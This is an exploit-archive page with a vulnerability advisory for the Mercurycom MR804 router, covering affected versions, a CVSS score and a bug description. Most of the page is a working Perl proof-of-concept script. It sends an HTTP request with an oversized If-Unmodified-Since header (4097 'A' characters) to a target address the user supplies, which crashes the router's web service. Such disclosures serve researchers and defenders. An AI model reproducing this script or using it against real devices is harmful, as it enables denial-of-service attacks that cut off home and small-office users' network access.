Home / exploitsPDF  

Mercurycom MR804 Router Denial Of Service

Posted on 22 February 2012

Title: Mercurycom MR804 Router - Multiple HTTP Header Fields Denial Of Service Vulnerability

Product : Mercurycom MR804 Router

Hardware Version : MR804 v8.0 081C3113

Software Version : 3.8.1 Build 101220 Rel.53006nB

Vendor: http://www.mercurycom.com.cn/

Class: Boundary Condition Error

CVE:

Remote: Yes

Local: No

Published: 2012-02-21

Updated:

Impact : Medium (CVSS2 Base : 6.1, AV:A/AC:L/Au:N/C:N/I:N/A:C)

Bug Description :
Mercurycom router are commonly used for internet connectivity for home or small office needs. (http://www.mercurycom.com.cn/Product/list)
Mercurycom MR804 Router contains any denial of service vulnerability about HTTP Header Fields(Such as If-Modified-Since, If-None-Match,
If-Unmodified-Since, etc...) in its HTTP service.

POC:
#-------------------------------------------------------------
#!/usr/bin/perl -w
use Socket;
$|=1;
print '*********************************'."
";
print '* mercurycom MR804 v8.0 DoS PoC *'."
";
print '* writed by demonalex@163.com *'."
";
print '*********************************'."
";
$evil='A'x4097;
$test_ip=shift; #target ip
$test_port=shift; #target port
if(!defined($test_ip) || !defined($test_port)){
 die "usage : $0 target_ip target_port
";
}
$test_payload=
"GET / HTTP/1.0
".
"Accept: */*
".
"Accept-Language: zh-cn
".
"UA-CPU: x86
".
"If-Unmodified-Since: ".$evil."
".
"Accept-Encoding: gzip, deflate
".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)
".
"Host: ".$test_ip."
".
"Connection: Keep-Alive"."

";
$test_target=inet_aton($test_ip);
$test_target=sockaddr_in($test_port, $test_target);
socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!
";
connect(SOCK, $test_target) || die "cannot connect the target!
";
send(SOCK, $test_payload, 0) || die "cannot send the payload!
";
#recv(SOCK, $test_payload, 100, 0);
close(SOCK);
print "done!
";
exit(1);
#-------------------------------------------------------------

Credits : This vulnerability was discovered by demonalex@163.com
mail: demonalex@163.com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK

 

TOP

Malware :

Exploits :